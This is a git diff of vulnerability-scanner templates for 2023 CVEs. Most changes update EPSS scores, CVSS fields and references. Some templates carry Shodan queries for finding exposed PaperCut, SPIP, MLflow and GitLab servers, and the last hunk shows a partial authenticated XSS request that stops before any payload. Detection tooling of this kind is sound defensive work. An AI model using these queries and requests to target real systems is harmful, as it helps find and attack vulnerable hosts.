diff --git a/http/cves/2023/CVE-2023-2732.yaml b/http/cves/2023/CVE-2023-2732.yaml
index 09e52fab98..16273ab8a9 100644
--- a/http/cves/2023/CVE-2023-2732.yaml
+++ b/http/cves/2023/CVE-2023-2732.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-288
epss-score: 0.04948
cpe: cpe:2.3:a:inspireui:mstore_api:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.91796
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2023/CVE-2023-27350.yaml b/http/cves/2023/CVE-2023-27350.yaml
index 5708da6b4b..69d95c8135 100644
--- a/http/cves/2023/CVE-2023-27350.yaml
+++ b/http/cves/2023/CVE-2023-27350.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2023-27350
cwe-id: CWE-284,NVD-CWE-Other
- epss-score: 0.97118
+ epss-score: 0.97086
cpe: cpe:2.3:a:papercut:papercut_mf:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99667
metadata:
max-request: 10
shodan-query: http.html:"PaperCut"
diff --git a/http/cves/2023/CVE-2023-27372.yaml b/http/cves/2023/CVE-2023-27372.yaml
index 5b29201bfe..acc1ab25e6 100644
--- a/http/cves/2023/CVE-2023-27372.yaml
+++ b/http/cves/2023/CVE-2023-27372.yaml
@@ -16,8 +16,9 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-27372
- epss-score: 0.97073
+ epss-score: 0.97084
cpe: cpe:2.3:a:spip:spip:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99665
metadata:
max-request: 2
shodan-query: html:"spip.php?page=backend"
diff --git a/http/cves/2023/CVE-2023-27482.yaml b/http/cves/2023/CVE-2023-27482.yaml
index 28179a62ff..dabb86049c 100644
--- a/http/cves/2023/CVE-2023-27482.yaml
+++ b/http/cves/2023/CVE-2023-27482.yaml
@@ -22,6 +22,7 @@ info:
cwe-id: CWE-287
epss-score: 0.03052
cpe: cpe:2.3:a:home-assistant:home-assistant:*:*:*:*:*:*:*:*
+ epss-percentile: 0.89691
metadata:
max-request: 3
verified: true
diff --git a/http/cves/2023/CVE-2023-27524.yaml b/http/cves/2023/CVE-2023-27524.yaml
index 98d771a318..c149df55e1 100644
--- a/http/cves/2023/CVE-2023-27524.yaml
+++ b/http/cves/2023/CVE-2023-27524.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2023-27524
cwe-id: CWE-1188
- epss-score: 0.71231
+ epss-score: 0.65287
cpe: cpe:2.3:a:apache:superset:*:*:*:*:*:*:*:*
+ epss-percentile: 0.97448
metadata:
max-request: 45
verified: true
diff --git a/http/cves/2023/CVE-2023-27587.yaml b/http/cves/2023/CVE-2023-27587.yaml
index 04c63b726a..2f61511195 100644
--- a/http/cves/2023/CVE-2023-27587.yaml
+++ b/http/cves/2023/CVE-2023-27587.yaml
@@ -18,8 +18,9 @@ info:
cvss-score: 6.5
cve-id: CVE-2023-27587
cwe-id: CWE-209
- epss-score: 0.13712
+ epss-score: 0.11296
cpe: cpe:2.3:a:readtomyshoe_project:readtomyshoe:*:*:*:*:*:*:*:*
+ epss-percentile: 0.94464
metadata:
max-request: 1
vendor: readtomyshoe_project
diff --git a/http/cves/2023/CVE-2023-2780.yaml b/http/cves/2023/CVE-2023-2780.yaml
index 8e2004aa8d..b19ca5e344 100644
--- a/http/cves/2023/CVE-2023-2780.yaml
+++ b/http/cves/2023/CVE-2023-2780.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2023-2780
cwe-id: CWE-29
- epss-score: 0.01159
+ epss-score: 0.01547
cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:*
+ epss-percentile: 0.85528
metadata:
max-request: 3
shodan-query: http.title:"mlflow"
diff --git a/http/cves/2023/CVE-2023-2796.yaml b/http/cves/2023/CVE-2023-2796.yaml
index 82a791d7d5..3e81d70577 100644
--- a/http/cves/2023/CVE-2023-2796.yaml
+++ b/http/cves/2023/CVE-2023-2796.yaml
@@ -10,14 +10,16 @@ info:
- https://www.wordfence.com/threat-intel/vulnerabilities/id/dba3f3a6-3f55-4f4e-98e4-bb98d9c94bdd
- https://wpscan.com/vulnerability/e9ef793c-e5a3-4c55-beee-56b0909f7a0d
- https://nvd.nist.gov/vuln/detail/CVE-2023-2796
+ - http://packetstormsecurity.com/files/173984/WordPress-EventON-Calendar-4.4-Insecure-Direct-Object-Reference.html
remediation: Fixed in version 2.1.2
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2023-2796
cwe-id: CWE-862
- epss-score: 0.00391
+ epss-score: 0.20197
cpe: cpe:2.3:a:myeventon:eventon:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.95694
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2023/CVE-2023-28121.yaml b/http/cves/2023/CVE-2023-28121.yaml
index 263eda8817..0f01b584b9 100644
--- a/http/cves/2023/CVE-2023-28121.yaml
+++ b/http/cves/2023/CVE-2023-28121.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2023-28121
cwe-id: CWE-287
- epss-score: 0.72766
+ epss-score: 0.93782
cpe: cpe:2.3:a:automattic:woocommerce_payments:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.98781
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2023/CVE-2023-2822.yaml b/http/cves/2023/CVE-2023-2822.yaml
index 88e59ad6d1..aa87c7ef87 100644
--- a/http/cves/2023/CVE-2023-2822.yaml
+++ b/http/cves/2023/CVE-2023-2822.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2023-2822
cwe-id: CWE-79
- epss-score: 0.01934
+ epss-score: 0.02305
cpe: cpe:2.3:a:ellucian:ethos_identity:*:*:*:*:*:*:*:*
+ epss-percentile: 0.88289
metadata:
max-request: 1
shodan-query: html:"Ellucian Company"
diff --git a/http/cves/2023/CVE-2023-2825.yaml b/http/cves/2023/CVE-2023-2825.yaml
index 943f2023dc..4de1244a21 100644
--- a/http/cves/2023/CVE-2023-2825.yaml
+++ b/http/cves/2023/CVE-2023-2825.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-22
epss-score: 0.02752
cpe: cpe:2.3:a:gitlab:gitlab:16.0.0:*:*:*:community:*:*:*
+ epss-percentile: 0.89231
metadata:
max-request: 16
shodan-query: title:"Gitlab"
diff --git a/http/cves/2023/CVE-2023-28343.yaml b/http/cves/2023/CVE-2023-28343.yaml
index 929a3a522b..88ec791244 100644
--- a/http/cves/2023/CVE-2023-28343.yaml
+++ b/http/cves/2023/CVE-2023-28343.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2023-28343
cwe-id: CWE-78
- epss-score: 0.39796
+ epss-score: 0.3827
cpe: cpe:2.3:o:apsystems:energy_communication_unit_firmware:c1.2.5:*:*:*:*:*:*:*
+ epss-percentile: 0.96725
metadata:
max-request: 1
google-query: intitle:"Altenergy Power Control Software"
diff --git a/http/cves/2023/CVE-2023-28432.yaml b/http/cves/2023/CVE-2023-28432.yaml
index b535f4edbd..20d78c0dbf 100644
--- a/http/cves/2023/CVE-2023-28432.yaml
+++ b/http/cves/2023/CVE-2023-28432.yaml
@@ -18,8 +18,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2023-28432
cwe-id: CWE-200
- epss-score: 0.3955
+ epss-score: 0.44017
cpe: cpe:2.3:a:minio:minio:*:*:*:*:*:*:*:*
+ epss-percentile: 0.96884
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2023/CVE-2023-28665.yaml b/http/cves/2023/CVE-2023-28665.yaml
index 63ca8a0e2d..19dc4fcd5c 100644
--- a/http/cves/2023/CVE-2023-28665.yaml
+++ b/http/cves/2023/CVE-2023-28665.yaml
@@ -6,15 +6,24 @@ info:
severity: medium
description: |
The Woo Bulk Price Update WordPress plugin, in versions < 2.2.2, is affected by a reflected cross-site scripting vulnerability in the 'page' parameter to the techno_get_products action, which can only be triggered by an authenticated user.
- remediation: Fixed in version 2.2.2
reference:
- https://wpscan.com/vulnerability/6f70182c-0392-40eb-a5b9-4ff91778e036
- https://nvd.nist.gov/vuln/detail/CVE-2023-28665
+ remediation: Fixed in version 2.2.2
classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 5.4
cve-id: CVE-2023-28665
+ cwe-id: CWE-79
+ epss-score: 0.00082
+ cpe: cpe:2.3:a:technocrackers:bulk_price_update_for_woocommerce:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.338
metadata:
max-request: 2
verified: true
+ framework: wordpress
+ vendor: technocrackers
+ product: bulk_price_update_for_woocommerce
tags: cve,cve2023,wordpress,wp,wp-plugin,wpscan,xss,authenticated,woo-bulk-price-update
http:
@@ -25,7 +34,6 @@ http:
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
-
- |
GET /wp-admin/admin-ajax.php?action=techno_get_products&page= |